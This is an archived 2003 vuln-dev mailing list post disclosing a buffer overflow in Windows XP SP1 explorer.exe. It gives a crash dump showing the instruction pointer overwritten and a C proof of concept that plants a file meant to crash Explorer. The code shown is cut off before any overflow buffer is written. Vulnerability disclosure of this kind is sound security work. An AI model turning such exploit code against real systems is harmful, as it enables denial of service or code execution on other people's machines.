Buffer overflow in Explorer.exe

From: aT4r InsaN3 (at4r_at_hotmail.com)
Date: 05/07/03

  • Next message: descript: "s0h: Kerio Personal Firewall and Tiny Personal Firewall remote exploit/patch."
    To: vuln-dev@securityfocus.com
    Date: Wed, 07 May 2003 22:53:50 +0200

    This bug allow a malicious an attacker to execute data with privileges of a
    user that is browsing the hard disk with explorer.

    tested against winxp SP1

    example code provided.


            Buffer Overflow in explorer.exe - Proof of Concept
            Tested only against: Windows XP SP1

            Found by aT4r@3wdesign.es

            Saludos a:
            - #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]", "tyr" }:
            - #localhost and #darknet

            Usage: just execute this file.
                    This code will crash your explorer every time you try to browse your
                    execute this program again to delete the evil file ;-)

            (3ec.464): Access violation - code c0000005 (first chance)
            First chance exceptions are reported before any exception handling.
            This exception may be expected and handled.
            eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70
            eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr na po
            cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
            00410041 ?? ???

            3W Design Security 2003. http://www.3WDesign.es/

    #include <direct.h>
    #include <stdio.h>
    #include <windows.h>
    #include <sys/stat.h>

    #define BUFF 2300
    void main(){

            char path[256];
            char evil[BUFF+1]="";
            FILE *bof;
            struct stat st;
            printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... .. .\n . ..
    ...: \tProof of Concept (aT4r@3wdesign.es)\t:... .. .\n\n");
            strcpy(path,"\\aT4r[at]3WDesign.es Security");

            if (stat(path,&st)==0)
                    { remove(path); exit(1);}//just execute this program twice to remote this
    file :P
            printf("evil file: %s Created. Try to browse your Harddisk O:-)\n",path);


    Hipotecas para todos los bolsillos con MSN Money.


  • Next message: descript: "s0h: Kerio Personal Firewall and Tiny Personal Firewall remote exploit/patch."

    Relevant Pages

    • Re: outlook at home and office _ HELP
      ... Outlook Express likes all of it's data files on the Local Hard disk. ... is OK with EML files on removable drives or even CD-ROM. ... Open the Windows File Explorer to the folder that you ...
      ... If I run my application from Visual Studio it starts up as Administrator (since I use David Ching's great suggestion to change the shortcut privileges). ... If I simply start the Explorer I can't drag and drop files, but if I right click and say "Start as administrator" it works fine. ... I think this is a klunky interface for Vista, but it is easy to work around. ... "David Webber" wrote in message ...
    • Re: Buffer overflow in Explorer.exe
      ... but what makes that entry in desktop.ini cause ... you mention that explorer will no longer be ... >user that is browsing the hard disk with explorer. ...
    • Re: Adobe Acobat
      ... scanning the hard drive for errors. ... Right click the hard disk from windows ... explorer and choose properties> click the tools tab> click check now and ...
    • My Computer does not show CD-ROM drive or Hard Disk.
      ... My hard disk and cd-rom drive doesn't show up when I go to My Computer. ... Doesn't work in Explorer or in Vapor. ... Prev by Date: ...